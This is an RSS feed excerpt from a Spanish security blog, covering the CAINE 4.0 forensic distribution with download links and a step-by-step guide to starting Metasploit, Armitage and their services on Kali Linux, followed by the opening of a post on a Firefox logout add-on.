&lt;div style="text-align: justify;"&gt;
&lt;u&gt;TheSleuthKit&amp;nbsp;&lt;/u&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
The Sleuth Kit (TSK) is a collection of UNIX-based command line tools that allow you to investigate a computer. Autopsy is a frontend for TSK which allows browser-based access to the TSK tools.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;u&gt;Log2Timeline&lt;/u&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
log2timeline, a framework for automatic creation of a super timeline. The main purpose is to provide a single tool to parse various log files and artifacts found on suspect systems (and supporting systems, such as network equipment) and produce a timeline that can be analysed by forensic investigators/analysts.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;u&gt;Autopsy&amp;nbsp;&lt;/u&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
The Autopsy Forensic Browser is a graphical interface to the command line digital investigation analysis tools in The Sleuth Kit. Together, they can analyze Windows and UNIX disks and file systems (NTFS, FAT, UFS1/2, Ext2/3).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Conduct File Listing, View File Content, Compare files in user created or downloaded Hash Databases, File Type Sorting by internal signatures, Create a Timeline of File Activity, conduct Keyword Searches, File System Meta Data Analysis, Data Unit (File Content) Analysis in multiple formats, File System Image Details: Case Management of one or more host computers, Event Sequencer allows you to add time-based events from other systems (ie firewall/ids logs), Notes about case, Image Integrity verification, Report Creation, Audit Logging of investigation.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" /&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;
&lt;/span&gt;&lt;/b&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Download&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;table border="0" cellpadding="3" cellspacing="3" style="background-color: #2c2c2c; color: #f4f4f4; font-family: 'Lucida Grande', Lucida, Verdana, sans-serif; font-size: 13px; line-height: 20.46875px; text-align: justify; width: 636px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;span class="Stile6" style="font-size: 16px; font-weight: bold;"&gt;&lt;a href="http://www.caine-live.net/Downloads/caine4.0.iso" style="color: #f3a424;"&gt;Caine4.0.iso&lt;/a&gt;&amp;nbsp;(&lt;a href="http://www.caine-live.net/Downloads/caine4.0.iso.md5.txt" style="color: #f3a424;" target="_blank"&gt;MD5&lt;/a&gt;)&amp;nbsp;&lt;/span&gt;&lt;span class="Stile13" style="font-size: 12px;"&gt;&lt;a class="Stile13" href="http://caine.mirror.garr.it/mirrors/caine/caine4.0.iso" style="color: #f3a424;"&gt;GARR/MIRROR&lt;/a&gt;&amp;nbsp;-&amp;nbsp;&lt;a href="http://www.caine-live.net/page5/Caine%204.0.torrent" style="color: #f3a424;"&gt;TORRENT&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;table border="0" cellpadding="3" cellspacing="3" style="background-color: #2c2c2c; color: #f4f4f4; font-family: 'Lucida Grande', Lucida, Verdana, sans-serif; font-size: 13px; line-height: 20.46875px; text-align: justify; width: 636px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: 15px;"&gt;&lt;strong&gt;&lt;a href="http://www.caine-live.net/Downloads/nbcaine4.0.iso" style="color: #f3a424;"&gt;NBCAINE 4.0&amp;nbsp;&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-size: 15px;"&gt;(&lt;a href="http://www.caine-live.net/Downloads/nbcaine4.0.iso.md5.txt" style="color: #f3a424;" target="_blank"&gt;MD5&lt;/a&gt;)&amp;nbsp;&lt;/span&gt;-&amp;nbsp;&lt;a class="Stile12" href="http://caine.mirror.garr.it/mirrors/caine/nbcaine4.0.iso" style="color: #f3a424;"&gt;GARR/MIRROR&lt;/a&gt;&lt;br /&gt;
NBCaine is the ISO of a live USB version of CAINE for&amp;nbsp;&lt;b&gt;NetBooks&lt;/b&gt;&amp;nbsp;ready for USB pendrive.&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
NOTA: Para la versión USB necesitarás mas de 2GB de capacidad. Puedes utilizar cualquiera de la siguientes herramientas para llevar a cabo la tarea ( &lt;a href="http://rufus.akeo.ie/" target="_blank"&gt;Rufus&lt;/a&gt; | &lt;a href="http://unetbootin.sourceforge.net/" target="_blank"&gt;UnebootIn&lt;/a&gt; ).&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Vía:&amp;nbsp;&lt;a href="http://www.caine-live.net/"&gt;http://www.caine-live.net&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=3wwrcIn5KBs:URrXOQNVmys:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=3wwrcIn5KBs:URrXOQNVmys:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=3wwrcIn5KBs:URrXOQNVmys:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=3wwrcIn5KBs:URrXOQNVmys:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=3wwrcIn5KBs:URrXOQNVmys:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=3wwrcIn5KBs:URrXOQNVmys:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=3wwrcIn5KBs:URrXOQNVmys:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=3wwrcIn5KBs:URrXOQNVmys:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=3wwrcIn5KBs:URrXOQNVmys:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=3wwrcIn5KBs:URrXOQNVmys:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/3wwrcIn5KBs" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/3wwrcIn5KBs/caine-40-codename-pulsar-lista-para-su.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-lUdj5jVRzoM/UUgmv8lZ6TI/AAAAAAAAEIs/Bbx6osCWgfg/s72-c/CAINE_4.0.Head.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/caine-40-codename-pulsar-lista-para-su.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-5307257344018755090</guid><pubDate>Sun, 17 Mar 2013 19:54:00 +0000</pubDate><atom:updated>2013-03-17T21:49:43.219+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">BackTrack</category><category domain="http://www.blogger.com/atom/ns#">Kali</category><title>Preparando Kali (aka BackTrack 6) Linux para usar Metasploit</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-bkw29b18UfQ/UUYP1duSDGI/AAAAAAAAEFI/bNh-oaP2d3I/s1600/Kali-Logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-bkw29b18UfQ/UUYP1duSDGI/AAAAAAAAEFI/bNh-oaP2d3I/s320/Kali-Logo.png" width="296" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace unos días se lanzo la versión 1.0 de &lt;a href="http://www.kali.org/" target="_blank"&gt;Kali Linux&lt;/a&gt;, la nueva distribución de Linux especialmente orientada a &amp;nbsp;los profesionales de la Seguridad&amp;nbsp;Informática, ya sean Auditores, Pentester o Forenses informáticos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
No voy a entrar en analizar las diferentes herramientas, ya que seguramente encontraréis&amp;nbsp;múltiples&amp;nbsp;artículos en Internet hablando de las bondades, herramientas y/o mejora que trae la nueva versión de la antigua BackTrack 5 RC3.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En este artículo voy a centrarme en poner a punto #Metasploit.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#Requisitos&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Disponer de un equipo y/o máquina virtual con Kali Linux&amp;nbsp;ejecutándose. Puedes conseguir una versión virtualizada (vmware) en la &lt;a href="http://www.kali.org/downloads/" target="_blank"&gt;página web oficial&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para las pruebas que se han realizado en nuestro laboratorio (ST2Labs) se ha creado la máquina virtual desde cero, instalando el sistema operativo desde la imagen ISO del Sistema.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Cómo empezamos?&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La primera vez que se va a utilizar #Metasploit es conveniente &lt;b&gt;&lt;u&gt;iniciar los servicios&lt;/u&gt;&lt;/b&gt; antes de empezar a jugar con ellos, en Kali se utilizar postgres SQL para dar soporte a la base de datos de metasploit, es por este motivo por lo que se va a empezar iniciando el servicio de base de datos.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En un terminal de consola ejecutamos el siguiente comando:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; text-align: left; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; text-align: left; white-space: nowrap;"&gt;&amp;gt; service postgresql start&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Y a continuación se ejecuta:&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; text-align: left; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; text-align: left; white-space: nowrap;"&gt;&amp;gt; service metasploit start&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; text-align: left; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-YX4tsPwvFkQ/UUYUfSq9PuI/AAAAAAAAEFQ/JE9ZYg2P15M/s1600/Kali-running_metasploit.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-YX4tsPwvFkQ/UUYUfSq9PuI/AAAAAAAAEFQ/JE9ZYg2P15M/s640/Kali-running_metasploit.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Starting metasploit on Kali Linux&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; text-align: left; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
Una vez iniciados, se ha creado&amp;nbsp;automáticamente&amp;nbsp;la base de datos &lt;b&gt;msf3&lt;/b&gt; y el usuario &lt;b&gt;msf3&lt;/b&gt; que&amp;nbsp;serán&amp;nbsp;los que utilice metasploit por defecto para conectarse con el sistema de base de datos (postgres SQL).&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Una vez ha finalizado el proceso anterior se tiene metasploit listo para empezar a funcionar, no hay más que teclear el siguiente comando en un terminal de consola:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; white-space: nowrap;"&gt;&amp;gt; msfconsole&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-WGEtYzy5ANA/UUYWjbt02BI/AAAAAAAAEFY/KwCC1nSVZcI/s1600/Kali-metasploit-console.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="382" src="http://3.bp.blogspot.com/-WGEtYzy5ANA/UUYWjbt02BI/AAAAAAAAEFY/KwCC1nSVZcI/s640/Kali-metasploit-console.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfconsole on Kali Linux&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Interfaz WEB&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si deseas utilizar la interfaz WEB de metasploit, entonces deberás de registrarte en la página web de metasploit y activar tu instalación con el código / licencia que te enviarán a la dirección de email introducida durante el registro.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/--SSRb_Qr2n8/UUYaA_VSu0I/AAAAAAAAEFo/6k1gzMc1Ujo/s1600/Kali-metasploit-web.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="242" src="http://1.bp.blogspot.com/--SSRb_Qr2n8/UUYaA_VSu0I/AAAAAAAAEFo/6k1gzMc1Ujo/s640/Kali-metasploit-web.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Metasploit Community WEB GUI&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-xM_VAYDE9TY/UUYZ6gnggAI/AAAAAAAAEFg/7coVDX5ADkc/s1600/Kali-metasploit-web-activation.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="242" src="http://3.bp.blogspot.com/-xM_VAYDE9TY/UUYZ6gnggAI/AAAAAAAAEFg/7coVDX5ADkc/s640/Kali-metasploit-web-activation.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Metasploit Activation WEB GUI.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;ARMITAGE&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
Ahora vamos a ejecutar la interfaz gráfica "Armitage": ¿Qué sucede? No se encuentra instalado por defecto en el Sistema.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Basta con ejecutar en el terminal de consola:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; white-space: nowrap;"&gt;&amp;gt; apt-get install armitage&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Listo, una vez finalizado todo el proceso tendremos, completamente preparado #Metasploit para empezar a jugar.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;¡ Por ultimo, se puede ejecutar msfupdate por si hubiera alguna actualización pendiente!&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; white-space: nowrap;"&gt;&amp;gt; msfupdate&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-6kE4J6wUOA8/UUYfIDiSzoI/AAAAAAAAEFw/75sRAFFif1M/s1600/Kali-metas-update.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-6kE4J6wUOA8/UUYfIDiSzoI/AAAAAAAAEFw/75sRAFFif1M/s1600/Kali-metas-update.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Metasploit update&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;span style="background-color: #f1f1f1; font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 18.1875px; white-space: nowrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Configurar Metasploit para que se inicie en el arranque del Sistema&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Antes de finalizar, conviene configurar metasploit para que inicie el servicio correctamente durante el arranque del Sistema.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class="codecolorer-container bash default" style="background-color: #f1f1f1; border: 1px solid rgb(159, 159, 159); font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 1.4em; margin-bottom: 10px; overflow: auto; white-space: nowrap; width: 660px;"&gt;
&lt;div class="bash codecolorer" style="line-height: 1.4em; padding: 5px;"&gt;
update-rc.d postgresql&amp;nbsp;&lt;span class="kw3" style="color: teal; line-height: 1.4em;"&gt;enable&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="codecolorer-container bash default" style="background-color: #f1f1f1; border: 1px solid rgb(159, 159, 159); font-family: Monaco, 'Lucida Console', monospace; font-size: 13px; line-height: 1.4em; margin-bottom: 10px; overflow: auto; white-space: nowrap; width: 660px;"&gt;
&lt;div class="bash codecolorer" style="line-height: 1.4em; padding: 5px;"&gt;
update-rc.d metasploit&amp;nbsp;&lt;span class="kw3" style="color: teal; line-height: 1.4em;"&gt;enable&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Un Saludo.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Referencias:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;a href="http://docs.kali.org/general-use/starting-metasploit-framework-in-kali" target="_blank"&gt;Starting Metasploit Framework on Kali Linux&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8M1Uy994XM8:8I-r9BKcKuU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8M1Uy994XM8:8I-r9BKcKuU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8M1Uy994XM8:8I-r9BKcKuU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=8M1Uy994XM8:8I-r9BKcKuU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8M1Uy994XM8:8I-r9BKcKuU:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8M1Uy994XM8:8I-r9BKcKuU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=8M1Uy994XM8:8I-r9BKcKuU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8M1Uy994XM8:8I-r9BKcKuU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8M1Uy994XM8:8I-r9BKcKuU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=8M1Uy994XM8:8I-r9BKcKuU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/8M1Uy994XM8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/8M1Uy994XM8/preparando-kali-aka-backtrack-6-linux.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-bkw29b18UfQ/UUYP1duSDGI/AAAAAAAAEFI/bNh-oaP2d3I/s72-c/Kali-Logo.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/preparando-kali-aka-backtrack-6-linux.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-4930215997865938526</guid><pubDate>Sat, 09 Mar 2013 20:04:00 +0000</pubDate><atom:updated>2013-03-09T21:04:19.979+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Web</category><category domain="http://www.blogger.com/atom/ns#">Secure</category><category domain="http://www.blogger.com/atom/ns#">Add-ons</category><category domain="http://www.blogger.com/atom/ns#">Firefox</category><title>[Add-Ons] para Firefox que muestra el botón de logout facilmente</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-x6yzIJT2D7M/UTuT7JVnbUI/AAAAAAAAEC0/pqR4sknrFzE/s1600/PopUP-Logout.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-x6yzIJT2D7M/UTuT7JVnbUI/AAAAAAAAEC0/pqR4sknrFzE/s1600/PopUP-Logout.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
